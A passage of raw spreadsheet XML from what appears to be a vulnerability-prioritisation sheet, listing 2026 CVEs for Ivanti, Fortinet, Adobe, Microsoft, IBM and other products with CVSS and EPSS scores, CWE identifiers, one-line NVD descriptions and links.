attacker to elevate privileges over a network.</t></is></c><c r="S29" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83711</t></is></c></row><row r="30"><c r="A30" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B30" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C30" s="5" t="inlineStr"><is><t>CVE-2026-12645</t></is></c><c r="D30" s="5" t="n"><v>9.9</v></c><c r="E30" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F30" s="5" t="inlineStr"><is><t>3c1d8aa1-5a33-4ea4-8992-aadd6440af75</t></is></c><c r="G30" s="5" t="inlineStr" /><c r="H30" s="5" t="n"><v>0.012</v></c><c r="I30" s="5" t="inlineStr" /><c r="J30" s="5" t="inlineStr" /><c r="K30" s="5" t="inlineStr" /><c r="L30" s="5" t="inlineStr" /><c r="M30" s="5" t="inlineStr" /><c r="N30" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O30" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P30" s="5" t="inlineStr" /><c r="Q30" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="R30" s="5" t="inlineStr"><is><t>A Missing Authorization vulnerability in Ivanti Neurons for ITSM before 2026.2 allows a remote authenticated attacker to execute arbitrary code on the server.</t></is></c><c r="S30" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-12645</t></is></c></row><row r="31"><c r="A31" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B31" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C31" s="5" t="inlineStr"><is><t>CVE-2026-12646</t></is></c><c r="D31" s="5" t="n"><v>9.9</v></c><c r="E31" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F31" s="5" t="inlineStr"><is><t>3c1d8aa1-5a33-4ea4-8992-aadd6440af75</t></is></c><c r="G31" s="5" t="inlineStr" /><c r="H31" s="5" t="n"><v>0.012</v></c><c r="I31" s="5" t="inlineStr" /><c r="J31" s="5" t="inlineStr" /><c r="K31" s="5" t="inlineStr" /><c r="L31" s="5" t="inlineStr" /><c r="M31" s="5" t="inlineStr" /><c r="N31" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O31" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P31" s="5" t="inlineStr" /><c r="Q31" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="R31" s="5" t="inlineStr"><is><t>A Missing Authorization vulnerability in Ivanti Neurons for ITSM before 2026.2 allows a remote authenticated attacker to execute arbitrary code on the server.</t></is></c><c r="S31" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-12646</t></is></c></row><row r="32"><c r="A32" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B32" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C32" s="5" t="inlineStr"><is><t>CVE-2026-12647</t></is></c><c r="D32" s="5" t="n"><v>9.9</v></c><c r="E32" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F32" s="5" t="inlineStr"><is><t>3c1d8aa1-5a33-4ea4-8992-aadd6440af75</t></is></c><c r="G32" s="5" t="inlineStr" /><c r="H32" s="5" t="n"><v>0.012</v></c><c r="I32" s="5" t="inlineStr" /><c r="J32" s="5" t="inlineStr" /><c r="K32" s="5" t="inlineStr" /><c r="L32" s="5" t="inlineStr" /><c r="M32" s="5" t="inlineStr" /><c r="N32" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O32" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P32" s="5" t="inlineStr" /><c r="Q32" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="R32" s="5" t="inlineStr"><is><t>A Missing Authorization vulnerability in Ivanti Neurons for ITSM before 2026.2 allows a remote authenticated attacker to execute arbitrary code on the server.</t></is></c><c r="S32" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-12647</t></is></c></row><row r="33"><c r="A33" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B33" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C33" s="5" t="inlineStr"><is><t>CVE-2026-12650</t></is></c><c r="D33" s="5" t="n"><v>9.9</v></c><c r="E33" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F33" s="5" t="inlineStr"><is><t>3c1d8aa1-5a33-4ea4-8992-aadd6440af75</t></is></c><c r="G33" s="5" t="inlineStr" /><c r="H33" s="5" t="n"><v>0.015</v></c><c r="I33" s="5" t="inlineStr" /><c r="J33" s="5" t="inlineStr" /><c r="K33" s="5" t="inlineStr" /><c r="L33" s="5" t="inlineStr" /><c r="M33" s="5" t="inlineStr" /><c r="N33" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O33" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P33" s="5" t="inlineStr" /><c r="Q33" s="5" t="inlineStr"><is><t>CWE-502</t></is></c><c r="R33" s="5" t="inlineStr"><is><t>A Deserialization of Untrusted Data vulnerability in Ivanti Neurons for ITSM before 2026.2 allows a remote authenticated attacker to execute arbitrary code on the server.</t></is></c><c r="S33" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-12650</t></is></c></row><row r="34"><c r="A34" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B34" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C34" s="5" t="inlineStr"><is><t>CVE-2026-19232</t></is></c><c r="D34" s="5" t="n"><v>9.9</v></c><c r="E34" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F34" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G34" s="5" t="inlineStr" /><c r="H34" s="5" t="n"><v>0.006</v></c><c r="I34" s="5" t="inlineStr" /><c r="J34" s="5" t="inlineStr" /><c r="K34" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L34" s="5" t="inlineStr" /><c r="M34" s="5" t="inlineStr" /><c r="N34" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O34" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P34" s="5" t="inlineStr" /><c r="Q34" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="R34" s="5" t="inlineStr"><is><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is></c><c r="S34" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-19232</t></is></c></row><row r="35"><c r="A35" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B35" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C35" s="5" t="inlineStr"><is><t>CVE-2026-26084</t></is></c><c r="D35" s="5" t="n"><v>9.9</v></c><c r="E35" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F35" s="5" t="inlineStr"><is><t>psirt@fortinet.com</t></is></c><c r="G35" s="5" t="inlineStr" /><c r="H35" s="5" t="n"><v>0.002</v></c><c r="I35" s="5" t="inlineStr" /><c r="J35" s="5" t="inlineStr"><is><t>fortinet</t></is></c><c r="K35" s="5" t="inlineStr" /><c r="L35" s="5" t="inlineStr" /><c r="M35" s="5" t="inlineStr" /><c r="N35" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O35" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P35" s="5" t="inlineStr" /><c r="Q35" s="5" t="inlineStr"><is><t>CWE-284</t></is></c><c r="R35" s="5" t="inlineStr"><is><t>A improper access control vulnerability in Fortinet FortiSandbox 5.0.0 through 5.0.5, FortiSandbox 4.4.0 through 4.4.8, FortiSandbox Cloud 5.0.4 through 5.0.5, FortiSandbox PaaS 5.0.4 through 5.0.5 may allow attacker to access sensitive information via crafted HTTP requests.</t></is></c><c r="S35" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-26084</t></is></c></row><row r="36"><c r="A36" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B36" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C36" s="5" t="inlineStr"><is><t>CVE-2026-48273</t></is></c><c r="D36" s="5" t="n"><v>9.9</v></c><c r="E36" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F36" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G36" s="5" t="inlineStr" /><c r="H36" s="5" t="n"><v>0.019</v></c><c r="I36" s="5" t="inlineStr" /><c r="J36" s="5" t="inlineStr" /><c r="K36" s="5" t="inlineStr"><is><t>adobe:coldfusion</t></is></c><c r="L36" s="5" t="inlineStr" /><c r="M36" s="5" t="inlineStr" /><c r="N36" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O36" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P36" s="5" t="inlineStr" /><c r="Q36" s="5" t="inlineStr"><is><t>CWE-95</t></is></c><c r="R36" s="5" t="inlineStr"><is><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is></c><c r="S36" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-48273</t></is></c></row><row r="37"><c r="A37" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B37" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C37" s="5" t="inlineStr"><is><t>CVE-2026-55565</t></is></c><c r="D37" s="5" t="n"><v>9.9</v></c><c r="E37" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F37" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G37" s="5" t="inlineStr" /><c r="H37" s="5" t="n"><v>0.005</v></c><c r="I37" s="5" t="inlineStr" /><c r="J37" s="5" t="inlineStr" /><c r="K37" s="5" t="inlineStr" /><c r="L37" s="5" t="inlineStr" /><c r="M37" s="5" t="inlineStr" /><c r="N37" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O37" s="5" t="inlineStr"><is><t>2026-08-28</t></is></c><c r="P37" s="5" t="inlineStr" /><c r="Q37" s="5" t="inlineStr"><is><t>CWE-94</t></is></c><c r="R37" s="5" t="inlineStr"><is><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is></c><c r="S37" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-55565</t></is></c></row><row r="38"><c r="A38" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B38" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C38" s="5" t="inlineStr"><is><t>CVE-2026-65818</t></is></c><c r="D38" s="5" t="n"><v>9.9</v></c><c r="E38" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F38" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G38" s="5" t="inlineStr" /><c r="H38" s="5" t="n"><v>0.003</v></c><c r="I38" s="5" t="inlineStr" /><c r="J38" s="5" t="inlineStr" /><c r="K38" s="5" t="inlineStr"><is><t>microsoft:power_platform</t></is></c><c r="L38" s="5" t="inlineStr" /><c r="M38" s="5" t="inlineStr" /><c r="N38" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O38" s="5" t="inlineStr"><is><t>2026-09-03</t></is></c><c r="P38" s="5" t="inlineStr" /><c r="Q38" s="5" t="inlineStr"><is><t>CWE-918</t></is></c><c r="R38" s="5" t="inlineStr"><is><t>Server-side request forgery (ssrf) in Power Automate allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="S38" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-65818</t></is></c></row><row r="39"><c r="A39" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B39" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C39" s="5" t="inlineStr"><is><t>CVE-2026-78234</t></is></c><c r="D39" s="5" t="n"><v>9.9</v></c><c r="E39" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F39" s="5" t="inlineStr"><is><t>secalert@redhat.com</t></is></c><c r="G39" s="5" t="inlineStr" /><c r="H39" s="5" t="n"><v>0.002</v></c><c r="I39" s="5" t="inlineStr" /><c r="J39" s="5" t="inlineStr" /><c r="K39" s="5" t="inlineStr" /><c r="L39" s="5" t="inlineStr" /><c r="M39" s="5" t="inlineStr" /><c r="N39" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O39" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P39" s="5" t="inlineStr" /><c r="Q39" s="5" t="inlineStr"><is><t>CWE-295</t></is></c><c r="R39" s="5" t="inlineStr"><is><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is></c><c r="S39" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78234</t></is></c></row><row r="40"><c r="A40" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B40" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C40" s="5" t="inlineStr"><is><t>CVE-2026-79748</t></is></c><c r="D40" s="5" t="n"><v>9.9</v></c><c r="E40" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F40" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G40" s="5" t="inlineStr" /><c r="H40" s="5" t="n"><v>0.003</v></c><c r="I40" s="5" t="inlineStr" /><c r="J40" s="5" t="inlineStr"><is><t>docker</t></is></c><c r="K40" s="5" t="inlineStr" /><c r="L40" s="5" t="inlineStr" /><c r="M40" s="5" t="inlineStr" /><c r="N40" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O40" s="5" t="inlineStr"><is><t>2026-08-31</t></is></c><c r="P40" s="5" t="inlineStr" /><c r="Q40" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="R40" s="5" t="inlineStr"><is><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is></c><c r="S40" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79748</t></is></c></row><row r="41"><c r="A41" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B41" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C41" s="5" t="inlineStr"><is><t>CVE-2026-86464</t></is></c><c r="D41" s="5" t="n"><v>9.9</v></c><c r="E41" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F41" s="5" t="inlineStr"><is><t>emo@eclipse.org</t></is></c><c r="G41" s="5" t="inlineStr" /><c r="H41" s="5" t="n"><v>0.004</v></c><c r="I41" s="5" t="inlineStr" /><c r="J41" s="5" t="inlineStr"><is><t>kubernetes, docker, postgresql, keycloak</t></is></c><c r="K41" s="5" t="inlineStr" /><c r="L41" s="5" t="inlineStr" /><c r="M41" s="5" t="inlineStr" /><c r="N41" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O41" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P41" s="5" t="inlineStr" /><c r="Q41" s="5" t="inlineStr"><is><t>CWE-1188, CWE-1392, CWE-200, CWE-306, CWE-798</t></is></c><c r="R41" s="5" t="inlineStr"><is><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is></c><c r="S41" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86464</t></is></c></row><row r="42"><c r="A42" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B42" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C42" s="5" t="inlineStr"><is><t>CVE-2023-42179</t></is></c><c r="D42" s="5" t="n"><v>9.800000000000001</v></c><c r="E42" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F42" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G42" s="5" t="inlineStr" /><c r="H42" s="5" t="n"><v>0.003</v></c><c r="I42" s="5" t="inlineStr" /><c r="J42" s="5" t="inlineStr" /><c r="K42" s="5" t="inlineStr" /><c r="L42" s="5" t="inlineStr" /><c r="M42" s="5" t="inlineStr" /><c r="N42" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O42" s="5" t="inlineStr"><is><t>2026-08-26</t></is></c><c r="P42" s="5" t="inlineStr" /><c r="Q42" s="5" t="inlineStr"><is><t>CWE-284</t></is></c><c r="R42" s="5" t="inlineStr"><is><t>Bird Home Automation GmbH D1101V-F 000140 is vulnerable to Incorrect Access Control via the Key derivation process, password validation process.</t></is></c><c r="S42" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2023-42179</t></is></c></row><row r="43"><c r="A43" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B43" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C43" s="5" t="inlineStr"><is><t>CVE-2024-11080</t></is></c><c r="D43" s="5" t="n"><v>9.800000000000001</v></c><c r="E43" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F43" s="5" t="inlineStr"><is><t>security@wordfence.com</t></is></c><c r="G43" s="5" t="inlineStr" /><c r="H43" s="5" t="n"><v>0.004</v></c><c r="I43" s="5" t="inlineStr" /><c r="J43" s="5" t="inlineStr" /><c r="K43" s="5" t="inlineStr" /><c r="L43" s="5" t="inlineStr" /><c r="M43" s="5" t="inlineStr" /><c r="N43" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O43" s="5" t="inlineStr"><is><t>2026-09-05</t></is></c><c r="P43" s="5" t="inlineStr" /><c r="Q43" s="5" t="inlineStr"><is><t>CWE-94</t></is></c><c r="R43" s="5" t="inlineStr"><is><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is></c><c r="S43" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2024-11080</t></is></c></row><row r="44"><c r="A44" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B44" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C44" s="5" t="inlineStr"><is><t>CVE-2026-10196</t></is></c><c r="D44" s="5" t="n"><v>9.800000000000001</v></c><c r="E44" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F44" s="5" t="inlineStr"><is><t>security@wordfence.com</t></is></c><c r="G44" s="5" t="inlineStr" /><c r="H44" s="5" t="n"><v>0.006</v></c><c r="I44" s="5" t="inlineStr" /><c r="J44" s="5" t="inlineStr" /><c r="K44" s="5" t="inlineStr" /><c r="L44" s="5" t="inlineStr" /><c r="M44" s="5" t="inlineStr" /><c r="N44" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O44" s="5" t="inlineStr"><is><t>2026-09-05</t></is></c><c r="P44" s="5" t="inlineStr" /><c r="Q44" s="5" t="inlineStr"><is><t>CWE-502</t></is></c><c r="R44" s="5" t="inlineStr"><is><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is></c><c r="S44" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-10196</t></is></c></row><row r="45"><c r="A45" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B45" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C45" s="5" t="inlineStr"><is><t>CVE-2026-12744</t></is></c><c r="D45" s="5" t="n"><v>9.800000000000001</v></c><c r="E45" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F45" s="5" t="inlineStr"><is><t>3c1d8aa1-5a33-4ea4-8992-aadd6440af75</t></is></c><c r="G45" s="5" t="inlineStr" /><c r="H45" s="5" t="n"><v>0.022</v></c><c r="I45" s="5" t="inlineStr" /><c r="J45" s="5" t="inlineStr" /><c r="K45" s="5" t="inlineStr" /><c r="L45" s="5" t="inlineStr" /><c r="M45" s="5" t="inlineStr" /><c r="N45" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O45" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P45" s="5" t="inlineStr" /><c r="Q45" s="5" t="inlineStr"><is><t>CWE-502</t></is></c><c r="R45" s="5" t="inlineStr"><is><t>A Deserialization of Untrusted Data vulnerability in Ivanti Neurons for ITSM before 2026.2 allows a remote unauthenticated attacker to execute arbitrary code on the server.</t></is></c><c r="S45" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-12744</t></is></c></row><row r="46"><c r="A46" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B46" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C46" s="5" t="inlineStr"><is><t>CVE-2026-12745</t></is></c><c r="D46" s="5" t="n"><v>9.800000000000001</v></c><c r="E46" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F46" s="5" t="inlineStr"><is><t>3c1d8aa1-5a33-4ea4-8992-aadd6440af75</t></is></c><c r="G46" s="5" t="inlineStr" /><c r="H46" s="5" t="n"><v>0.021</v></c><c r="I46" s="5" t="inlineStr" /><c r="J46" s="5" t="inlineStr" /><c r="K46" s="5" t="inlineStr" /><c r="L46" s="5" t="inlineStr" /><c r="M46" s="5" t="inlineStr" /><c r="N46" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O46" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P46" s="5" t="inlineStr" /><c r="Q46" s="5" t="inlineStr"><is><t>CWE-502</t></is></c><c r="R46" s="5" t="inlineStr"><is><t>A Deserialization of Untrusted Data vulnerability in Ivanti Neurons for ITSM before 2026.2 allows a remote unauthenticated attacker to execute arbitrary code on the server.</t></is></c><c r="S46" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-12745</t></is></c></row><row r="47"><c r="A47" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B47" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C47" s="5" t="inlineStr"><is><t>CVE-2026-13447</t></is></c><c r="D47" s="5" t="n"><v>9.800000000000001</v></c><c r="E47" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F47" s="5" t="inlineStr"><is><t>security@wordfence.com</t></is></c><c r="G47" s="5" t="inlineStr" /><c r="H47" s="5" t="n"><v>0.004</v></c><c r="I47" s="5" t="inlineStr" /><c r="J47" s="5" t="inlineStr"><is><t>openssl</t></is></c><c r="K47" s="5" t="inlineStr" /><c r="L47" s="5" t="inlineStr" /><c r="M47" s="5" t="inlineStr" /><c r="N47" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O47" s="5" t="inlineStr"><is><t>2026-09-05</t></is></c><c r="P47" s="5" t="inlineStr" /><c r="Q47" s="5" t="inlineStr"><is><t>CWE-287</t></is></c><c r="R47" s="5" t="inlineStr"><is><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is></c><c r="S47" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-13447</t></is></c></row><row r="48"><c r="A48" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B48" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C48" s="5" t="inlineStr"><is><t>CVE-2026-16310</t></is></c><c r="D48" s="5" t="n"><v>9.800000000000001</v></c><c r="E48" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F48" s="5" t="inlineStr"><is><t>security@wordfence.com</t></is></c><c r="G48" s="5" t="inlineStr" /><c r="H48" s="5" t="n"><v>0.003</v></c><c r="I48" s="5" t="inlineStr" /><c r="J48" s="5" t="inlineStr" /><c r="K48" s="5" t="inlineStr" /><c r="L48" s="5" t="inlineStr" /><c r="M48" s="5" t="inlineStr" /><c r="N48" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O48" s="5" t="inlineStr"><is><t>2026-09-06</t></is></c><c r="P48" s="5" t="inlineStr" /><c r="Q48" s="5" t="inlineStr"><is><t>CWE-639</t></is></c><c r="R48" s="5" t="inlineStr"><is><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is></c><c r="S48" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-16310</t></is></c></row><row r="49"><c r="A49" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B49" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C49" s="5" t="inlineStr"><is><t>CVE-2026-18221</t></is></c><c r="D49" s="5" t="n"><v>9.800000000000001</v></c><c r="E49" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F49" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G49" s="5" t="inlineStr" /><c r="H49" s="5" t="n"><v>0.003</v></c><c r="I49" s="5" t="inlineStr" /><c r="J49" s="5" t="inlineStr" /><c r="K49" s="5" t="inlineStr"><is><t>ibm:i</t></is></c><c r="L49" s="5" t="inlineStr" /><c r="M49" s="5" t="inlineStr" /><c r="N49" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O49" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P49" s="5" t="inlineStr" /><c r="Q49" s="5" t="inlineStr"><is><t>CWE-287</t></is></c><c r="R49" s="5" t="inlineStr"><is><t>IBM i 7.6, 7.5, 7.4, and 7.3 could allow a remote attacker to gain unauthorized access due to improper validation of client-supplied authentication parameters.</t></is></c><c r="S49" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-18221</t></is></c></row><row r="50"><c r="A50" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B50" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C50" s="5" t="inlineStr"><is><t>CVE-2026-28606</t></is></c><c r="D50" s="5" t="n"><v>9.800000000000001</v></c><c r="E50" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F50" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G50" s="5" t="inlineStr" /><c r="H50" s="5" t="n"><v>0.003</v></c><c r="I50" s="5" t="inlineStr" /><c r="J50" s="5" t="inlineStr" /><c r="K50" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L50" s="5" t="inlineStr" /><c r="M50" s="5" t="inlineStr" /><c r="N50" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O50" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P50" s="5" t="inlineStr" /><c r="Q50" s="5" t="inlineStr"><is><t>CWE-287</t></is></c><c r="R50" s="5" t="inlineStr"><is><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is></c><c r="S50" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28606</t></is></c></row><row r="51"><c r="A51" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B51" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C51" s="5" t="inlineStr"><is><t>CVE-2026-31020</t></is></c><c r="D51" s="5" t="n"><v>9.800000000000001</v></c><c r="E51" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F51" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G51" s="5" t="inlineStr" /><c r="H51" s="5" t="n"><v>0.006</v></c><c r="I51" s="5" t="inlineStr" /><c r="J51" s="5" t="inlineStr" /><c r="K51" s="5" t="inlineStr" /><c r="L51" s="5" t="inlineStr" /><c r="M51" s="5" t="inlineStr" /><c r="N51" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O51" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P51" s="5" t="inlineStr" /><c r="Q51" s="5" t="inlineStr"><is><t>CWE-94</t></is></c><c r="R51" s="5" t="inlineStr"><is><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is></c><c r="S51" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-31020</t></is></c></row><row r="52"><c r="A52" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B52" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C52" s="5" t="inlineStr"><is><t>CVE-2026-35868</t></is></c><c r="D52" s="5" t="n"><v>9.800000000000001</v></c><c r="E52" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F52" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G52" s="5" t="inlineStr" /><c r="H52" s="5" t="n"><v>0.014</v></c><c r="I52" s="5" t="inlineStr" /><c r="J52" s="5" t="inlineStr" /><c r="K52" s="5" t="inlineStr" /><c r="L52" s="5" t="inlineStr" /><c r="M52" s="5" t="inlineStr" /><c r="N52" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O52" s="5" t="inlineStr"><is><t>2026-08-27</t></is></c><c r="P52" s="5" t="inlineStr" /><c r="Q52" s="5" t="inlineStr"><is><t>CWE-20</t></is></c><c r="R52" s="5" t="inlineStr"><is><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is></c><c r="S52" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-35868</t></is></c></row><row r="53"><c r="A53" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B53" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C53" s="5" t="inlineStr"><is><t>CVE-2026-35869</t></is></c><c r="D53" s="5" t="n"><v>9.800000000000001</v></c><c r="E53" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F53" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G53" s="5" t="inlineStr" /><c r="H53" s="5" t="n"><v>0.013</v></c><c r="I53" s="5" t="inlineStr" /><c r="J53" s="5" t="inlineStr" /><c r="K53" s="5" t="inlineStr" /><c r="L53" s="5" t="inlineStr" /><c r="M53" s="5" t="inlineStr" /><c r="N53" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O53" s="5" t="inlineStr"><is><t>2026-08-27</t></is></c><c r="P53" s="5" t="inlineStr" /><c r="Q53" s="5" t="inlineStr"><is><t>CWE-20</t></is></c><c r="R53" s="5" t="inlineStr"><is><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is></c><c r="S53" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-35869</t></is></c></row><row r="54"><c r="A54" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B54" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C54" s="5" t="inlineStr"><is><t>CVE-2026-37003</t></is></c><c r="D54" s="5" 